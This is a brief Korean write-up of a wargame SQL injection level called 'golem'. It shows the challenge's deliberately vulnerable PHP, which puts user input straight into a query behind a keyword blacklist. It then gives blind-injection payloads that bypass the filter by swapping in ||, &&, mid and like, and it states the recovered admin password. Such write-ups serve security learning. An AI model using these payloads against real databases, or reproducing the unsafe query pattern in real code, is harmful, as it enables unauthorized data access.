<?php 
  include "./config.php"; 
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); 
  if(preg_match('/or|and|substr\(|=/i', $_GET[pw])) exit("HeHe"); 
  $query = "select id from prob_golem where id='guest' and pw='{$_GET[pw]}'"; 
  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>"; 
   
  $_GET[pw] = addslashes($_GET[pw]); 
  $query = "select pw from prob_golem where id='admin' and pw='{$_GET[pw]}'"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("golem"); 
  highlight_file(__FILE__); 
?>

문제 파일은 다음과 같다.

or = ||
and = &&
substr = mid로 대체하여 문제를 쉽게 풀 수 있다.

' || id like 'admin' && length(pw) like 1~? #

해당 페이로드를 활용하여 password를 찾을 수 있다.
찾아낸 Pw의 길이는 8이다.

' || id like 'admin' && ascii(mid(pw, 1, 1)) > 60

해당 페이로드를 활용하여 admin계정의 암호를 한자리씩 알아내면 된다.
password는 77d6290b이다. 
